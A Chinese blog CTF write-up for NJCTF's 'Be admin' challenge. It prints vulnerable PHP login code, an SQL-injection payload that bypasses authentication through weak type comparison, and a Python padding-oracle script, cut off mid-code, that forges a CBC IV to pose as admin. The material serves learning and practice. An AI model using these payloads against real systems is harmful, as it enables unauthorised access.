<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />



  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.ico?v=5.1.4">






  <meta name="keywords" content="CBC,NJCTF,Padding Oracle," />










<meta name="description" content="简要介绍刚好最近迷上了Web中的密码学攻击利用，才弄完CBC模式下的比特翻转攻击，不想立马就在CTF中碰见了Padding Oracle攻击，刚好还没学，正好学习一波，还不用自己找环境，源码审计，不用开脑洞~~">
<meta name="keywords" content="CBC,NJCTF,Padding Oracle">
<meta property="og:type" content="article">
<meta property="og:title" content="NJCTF Padding Oracle攻击利用">
<meta property="og:url" content="http://www.beesfun.com/2017/03/12/NJCTF-Padding-Oracle攻击利用/index.html">
<meta property="og:site_name" content="Ethan&#39; Blog">
<meta property="og:description" content="简要介绍刚好最近迷上了Web中的密码学攻击利用，才弄完CBC模式下的比特翻转攻击，不想立马就在CTF中碰见了Padding Oracle攻击，刚好还没学，正好学习一波，还不用自己找环境，源码审计，不用开脑洞~~">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://www.beesfun.com/2017/03/12/NJCTF-Padding-Oracle攻击利用/desc.png">
<meta property="og:updated_time" content="2017-08-31T01:14:44.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="NJCTF Padding Oracle攻击利用">
<meta name="twitter:description" content="简要介绍刚好最近迷上了Web中的密码学攻击利用，才弄完CBC模式下的比特翻转攻击，不想立马就在CTF中碰见了Padding Oracle攻击，刚好还没学，正好学习一波，还不用自己找环境，源码审计，不用开脑洞~~">
<meta name="twitter:image" content="http://www.beesfun.com/2017/03/12/NJCTF-Padding-Oracle攻击利用/desc.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://www.beesfun.com/2017/03/12/NJCTF-Padding-Oracle攻击利用/"/>





  <title>NJCTF Padding Oracle攻击利用 | Ethan' Blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Ethan' Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://www.beesfun.com/2017/03/12/NJCTF-Padding-Oracle攻击利用/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Ethan">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="https://avatars3.githubusercontent.com/u/15061633">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Ethan' Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">NJCTF Padding Oracle攻击利用</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-03-12T15:24:53+08:00">
                2017-03-12
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/" itemprop="url" rel="index">
                    <span itemprop="name">CTF</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2017/03/12/NJCTF-Padding-Oracle攻击利用/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count gitment-comments-count" data-xid="/2017/03/12/NJCTF-Padding-Oracle攻击利用/" itemprop="commentsCount"></span>
                </a>
              </span>
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="简要介绍"><a href="#简要介绍" class="headerlink" title="简要介绍"></a>简要介绍</h2><p>刚好最近迷上了Web中的密码学攻击利用，才弄完CBC模式下的比特翻转攻击，不想立马就在CTF中碰见了Padding Oracle攻击，刚好还没学，正好学习一波，还不用自己找环境，源码审计，不用开脑洞~~</p>
<a id="more"></a>
<blockquote>
<p>题目: Be admin</p>
</blockquote>
<img src="/2017/03/12/NJCTF-Padding-Oracle攻击利用/desc.png">
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">define(<span class="string">"SECRET_KEY"</span>, <span class="string">"......"</span>);</span><br><span class="line">define(<span class="string">"METHOD"</span>, <span class="string">"aes-128-cbc"</span>);</span><br><span class="line"></span><br><span class="line">session_start();</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">get_random_token</span><span class="params">()</span></span>&#123;</span><br><span class="line">    $random_token=<span class="string">''</span>;</span><br><span class="line">    <span class="keyword">for</span>($i=<span class="number">0</span>;$i&lt;<span class="number">16</span>;$i++)&#123;</span><br><span class="line">        $random_token.=chr(rand(<span class="number">1</span>,<span class="number">255</span>));</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> $random_token;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">get_identity</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">global</span> $defaultId;</span><br><span class="line">    $j = $defaultId;</span><br><span class="line">    $token = get_random_token();    <span class="comment">// IV</span></span><br><span class="line">    $c = openssl_encrypt($j, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $token);</span><br><span class="line">    $_SESSION[<span class="string">'id'</span>] = base64_encode($c);</span><br><span class="line">    setcookie(<span class="string">"ID"</span>, base64_encode($c));</span><br><span class="line">    setcookie(<span class="string">"token"</span>, base64_encode($token));</span><br><span class="line">    <span class="keyword">if</span> ($j === <span class="string">'admin'</span>) &#123;</span><br><span class="line">        $_SESSION[<span class="string">'isadmin'</span>] = <span class="keyword">true</span>;</span><br><span class="line">    &#125; <span class="keyword">else</span> $_SESSION[<span class="string">'isadmin'</span>] = <span class="keyword">false</span>;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">test_identity</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (!<span class="keyword">isset</span>($_COOKIE[<span class="string">"token"</span>]))</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">array</span>();</span><br><span class="line">    <span class="keyword">if</span> (<span class="keyword">isset</span>($_SESSION[<span class="string">'id'</span>])) &#123;</span><br><span class="line">        $c = base64_decode($_SESSION[<span class="string">'id'</span>]);</span><br><span class="line">        <span class="keyword">if</span> ($u = openssl_decrypt($c, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, base64_decode($_COOKIE[<span class="string">"token"</span>]))) &#123;</span><br><span class="line">            <span class="keyword">if</span> ($u === <span class="string">'admin'</span>) &#123;</span><br><span class="line">                $_SESSION[<span class="string">'isadmin'</span>] = <span class="keyword">true</span>;</span><br><span class="line">            &#125; <span class="keyword">else</span> $_SESSION[<span class="string">'isadmin'</span>] = <span class="keyword">false</span>;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">"ERROR!"</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">login</span><span class="params">($encrypted_pass, $pass)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    $encrypted_pass = base64_decode($encrypted_pass);</span><br><span class="line">    $iv = substr($encrypted_pass, <span class="number">0</span>, <span class="number">16</span>);</span><br><span class="line">    $cipher = substr($encrypted_pass, <span class="number">16</span>);</span><br><span class="line">    $password = openssl_decrypt($cipher, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv);</span><br><span class="line">    <span class="keyword">return</span> $password == $pass;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">need_login</span><span class="params">($message = NULL)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"   &lt;!doctype html&gt;</span></span><br><span class="line"><span class="string">        &lt;html&gt;</span></span><br><span class="line"><span class="string">        &lt;head&gt;</span></span><br><span class="line"><span class="string">        &lt;meta charset=\"UTF-8\"&gt;</span></span><br><span class="line"><span class="string">        &lt;title&gt;Login&lt;/title&gt;</span></span><br><span class="line"><span class="string">        &lt;link rel=\"stylesheet\" href=\"CSS/target.css\"&gt;</span></span><br><span class="line"><span class="string">            &lt;script src=\"https://cdnjs.cloudflare.com/ajax/libs/prefixfree/1.0.7/prefixfree.min.js\"&gt;&lt;/script&gt;</span></span><br><span class="line"><span class="string">        &lt;/head&gt;</span></span><br><span class="line"><span class="string">        &lt;body&gt;"</span>;</span><br><span class="line">    <span class="keyword">if</span> (<span class="keyword">isset</span>($message)) &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">"  &lt;div&gt;"</span> . $message . <span class="string">"&lt;/div&gt;\n"</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"&lt;form method=\"POST\" action=''&gt;</span></span><br><span class="line"><span class="string">            &lt;div class=\"body\"&gt;&lt;/div&gt;</span></span><br><span class="line"><span class="string">		        &lt;div class=\"grad\"&gt;&lt;/div&gt;</span></span><br><span class="line"><span class="string">		            &lt;div class=\"header\"&gt;</span></span><br><span class="line"><span class="string">			            &lt;div&gt;Log&lt;span&gt;In&lt;/span&gt;&lt;/div&gt;</span></span><br><span class="line"><span class="string">		            &lt;/div&gt;</span></span><br><span class="line"><span class="string">		            &lt;br&gt;</span></span><br><span class="line"><span class="string">		            &lt;div class=\"login\"&gt;</span></span><br><span class="line"><span class="string">                        &lt;input type=\"text\" placeholder=\"username\" name=\"username\"&gt;</span></span><br><span class="line"><span class="string">                        &lt;input type=\"password\" placeholder=\"password\" name=\"password\"&gt;               </span></span><br><span class="line"><span class="string">                        &lt;input type=\"submit\" value=\"Login\"&gt;</span></span><br><span class="line"><span class="string">                    &lt;/div&gt;</span></span><br><span class="line"><span class="string">                     &lt;script src='http://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'&gt;&lt;/script&gt;</span></span><br><span class="line"><span class="string">            &lt;/form&gt;</span></span><br><span class="line"><span class="string">        &lt;/body&gt;</span></span><br><span class="line"><span class="string">    &lt;/html&gt;"</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">show_homepage</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"&lt;!doctype html&gt;</span></span><br><span class="line"><span class="string">&lt;html&gt;</span></span><br><span class="line"><span class="string">&lt;head&gt;&lt;title&gt;Login&lt;/title&gt;&lt;/head&gt;</span></span><br><span class="line"><span class="string">&lt;body&gt;"</span>;</span><br><span class="line">    <span class="keyword">global</span> $flag;</span><br><span class="line">    printf(<span class="string">"Hello ~~~ ctfer! "</span>);</span><br><span class="line">    <span class="keyword">if</span> ($_SESSION[<span class="string">"isadmin"</span>])</span><br><span class="line">        <span class="keyword">echo</span> $flag;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"&lt;div&gt;&lt;a href=\"logout.php\"&gt;Log out&lt;/a&gt;&lt;/div&gt;</span></span><br><span class="line"><span class="string">&lt;/body&gt;</span></span><br><span class="line"><span class="string">&lt;/html&gt;"</span>;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'username'</span>]) &amp;&amp; <span class="keyword">isset</span>($_POST[<span class="string">'password'</span>])) &#123;</span><br><span class="line">    $username = (string)$_POST[<span class="string">'username'</span>];</span><br><span class="line">    $password = (string)$_POST[<span class="string">'password'</span>];</span><br><span class="line">    $query = <span class="string">"SELECT username, encrypted_pass from users WHERE username='$username'"</span>;</span><br><span class="line">    $res = $conn-&gt;query($query) <span class="keyword">or</span> trigger_error($conn-&gt;error . <span class="string">"[$query]"</span>);</span><br><span class="line">    <span class="keyword">if</span> ($row = $res-&gt;fetch_assoc()) &#123;</span><br><span class="line">        $uname = $row[<span class="string">'username'</span>];</span><br><span class="line">        $encrypted_pass = $row[<span class="string">"encrypted_pass"</span>];</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> ($row &amp;&amp; login($encrypted_pass, $password)) &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">"you are in!"</span> . <span class="string">"&lt;/br&gt;"</span>;</span><br><span class="line">        get_identity();</span><br><span class="line">        show_homepage();</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">"&lt;script&gt;alert('login failed!');&lt;/script&gt;"</span>;</span><br><span class="line">        need_login(<span class="string">"Login Failed!"</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    test_identity();</span><br><span class="line">    <span class="keyword">if</span> (<span class="keyword">isset</span>($_SESSION[<span class="string">"id"</span>])) &#123;</span><br><span class="line">        show_homepage();</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        need_login();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>大致阅读下代码，可以看出程序逻辑，首先要通过用户认证，也就是说要登录成功，服务端会设置<code>$_SESSION[&quot;id&quot;]</code>, 这是后续Padding Oracle攻击的基础；<br><code>$_SESSION[&quot;id&quot;]</code>是<code>aes-128-cbc</code>加密后的密文，我们能获取初始向量IV,也就是<code>Cookie[&#39;token&#39;]</code>, 通过Padding Oracle攻击伪造IV使得解出来的明文为<code>admin</code>即可。</p>
<h2 id="SQL注入-弱类型比较绕过登录"><a href="#SQL注入-弱类型比较绕过登录" class="headerlink" title="SQL注入+弱类型比较绕过登录"></a>SQL注入+弱类型比较绕过登录</h2><p>查看程序代码，用户认证是通过比较<code>$password</code> == <code>$pass</code>是否相等，<code>$pass</code> 是用户输入的密码，用户可控；而<code>$password</code> 是经AES解密后的值， 而密文<code>$encrypted_pass</code>是从数据库中查询出来的，存在SQL注入，用户可控，然而由于不知道秘钥，也就无法控制解密后的明文。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">login</span><span class="params">($encrypted_pass, $pass)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    $encrypted_pass = base64_decode($encrypted_pass);</span><br><span class="line">    $iv = substr($encrypted_pass, <span class="number">0</span>, <span class="number">16</span>);</span><br><span class="line">    $cipher = substr($encrypted_pass, <span class="number">16</span>);</span><br><span class="line">    $password = openssl_decrypt($cipher, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv);</span><br><span class="line">    <span class="keyword">return</span> $password == $pass;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>查询<code>openssl_decrypt</code>函数，其返回结果解释如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">The decrypted string on success or FALSE on failure</span><br></pre></td></tr></table></figure>
<p>解密成功返回解密字符串， 失败则返回<code>false</code>, 如果我们令解密失败返回<code>false</code>, 那么我们只需要<code>$pass=&#39;&#39;</code>或<code>$pass=&#39;0&#39;</code>, 即可利用弱类型比较通过用户认证。要让解密失败，只需令密文长度不满足分组长度要求即可。</p>
<p>payload如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">username=-1&apos; union select 1,1 %23</span><br><span class="line">password=0</span><br></pre></td></tr></table></figure>
<p>获取Cookie:</p>
<ul>
<li><code>token=fxAXU2%2Fzw6PmPMm1TkAgRg%3D%3D</code></li>
<li><code>ID=56mJDsCs%2BQQf%2B44j1et%2BrQ%3D%3D</code></li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">Set-Cookie: ID=56mJDsCs%2BQQf%2B44j1et%2BrQ%3D%3D</span><br><span class="line">Set-Cookie: token=fxAXU2%2Fzw6PmPMm1TkAgRg%3D%3D</span><br><span class="line">Content-Length: 155</span><br><span class="line"></span><br><span class="line">you are in!&lt;/br&gt;&lt;!doctype html&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;&lt;title&gt;Login&lt;/title&gt;&lt;/head&gt;</span><br><span class="line">&lt;body&gt;Hello ~~~ ctfer! &lt;div&gt;&lt;a href=&quot;logout.php&quot;&gt;Log out&lt;/a&gt;&lt;/div&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>
<h2 id="Padding-Oracle攻击位置cookie"><a href="#Padding-Oracle攻击位置cookie" class="headerlink" title="Padding Oracle攻击位置cookie"></a>Padding Oracle攻击位置cookie</h2><p>认证成功过后，就是利用Padding Oracle攻击获取<code>$_SESSION[&quot;id&quot;]</code>解密后的中间值value, 然后伪造IV, 使得 <code>IV XOR value = &#39;admin&#39; + string(0x11）* 11</code>, 即可。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">str_xor</span><span class="params">(a, b)</span>:</span></span><br><span class="line">    <span class="keyword">return</span> <span class="string">''</span>.join([chr(ord(i) ^ ord(j)) <span class="keyword">for</span> i, j <span class="keyword">in</span> zip(a, b)])</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">base_url = <span class="string">"http://218.2.197.235:23737/index.php"</span></span><br><span class="line"></span><br><span class="line">cookies = &#123;</span><br><span class="line">    <span class="string">'token'</span>: <span class="string">''</span>,</span><br><span class="line">    <span class="string">'PHPSESSID'</span>: <span class="string">'9uq1qjbeunb085pacngnmhupp3'</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">tmp_iv = <span class="string">'0'</span> * <span class="number">16</span></span><br><span class="line">tmp_ivs = list(tmp_iv)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 中间值 [123, 216, 172, 195, 38, 202, 124, 77, 207, 192, 18, 77, 136, 98, 31]</span></span><br><span class="line">value = []</span><br><span class="line"></span><br><span class="line"><span class="comment"># 只能破解出value后15个字符</span></span><br><span class="line"><span class="keyword">for</span> flag <span class="keyword">in</span> range(<span class="number">1</span>, <span class="number">16</span>):</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">256</span>):</span><br><span class="line">        <span class="comment"># brute</span></span><br><span class="line">        tmp_ivs[<span class="number">15</span>-len(value)] = chr(i)</span><br><span class="line">        cookies[<span class="string">'token'</span>] = base64.b64encode(<span class="string">''</span>.join(tmp_ivs))</span><br><span class="line">        resp = requests.get(base_url, cookies=cookies,</span><br><span class="line">                            proxies=&#123;<span class="string">'http'</span>: <span class="string">'http://127.0.0.1:8080'</span>&#125;)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">'ERROR'</span> <span class="keyword">not</span> <span class="keyword">in</span> resp.content:</span><br><span class="line">            value.append(flag ^ i)</span><br><span class="line">            <span class="comment"># 更改初始向量</span></span><br><span class="line">            tmp_iv = <span class="string">'0'</span> * (<span class="number">16</span>-len(value)) + <span class="string">''</span>.join(chr(value[i] ^ (flag+<span class="number">1</span>))</span><br><span class="line">                                        <span class="keyword">for</span> i <span class="keyword">in</span> range(len(value)<span class="number">-1</span>, <span class="number">-1</span>, <span class="number">-1</span>))</span><br><span class="line">            tmp_ivs = list(tmp_iv)</span><br><span class="line"></span><br><span class="line">            <span class="keyword">print</span> flag, i, value</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">        <span class="keyword">if</span> i == <span class="number">255</span>:</span><br><span class="line">            <span class="keyword">print</span> resp.content</span><br><span class="line">            <span class="keyword">print</span> <span class="string">'error'</span></span><br><span class="line">            sys.exit(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 逆序</span></span><br><span class="line">value.reverse()</span><br><span class="line"></span><br><span class="line">fake_id = <span class="string">'admin'</span> + chr(<span class="number">11</span>) * <span class="number">11</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">256</span>):</span><br><span class="line">    <span class="comment"># 爆破value 第一个字符</span></span><br><span class="line">    value = chr(i) + <span class="string">''</span>.join(chr(v) <span class="keyword">for</span> v <span class="keyword">in</span> value)</span><br><span class="line">    iv = str_xor(value, fake_id)</span><br><span class="line">    cookies[<span class="string">'token'</span>] = base64.b64encode(iv)</span><br><span class="line">    resp = requests.get(base_url, cookies=cookies)</span><br><span class="line">    <span class="keyword">if</span> <span class="string">'ERROR'</span> <span class="keyword">not</span> <span class="keyword">in</span> resp.content <span class="keyword">and</span> len(resp.content) &gt; <span class="number">139</span>:</span><br><span class="line">        <span class="keyword">print</span> value</span><br><span class="line">        <span 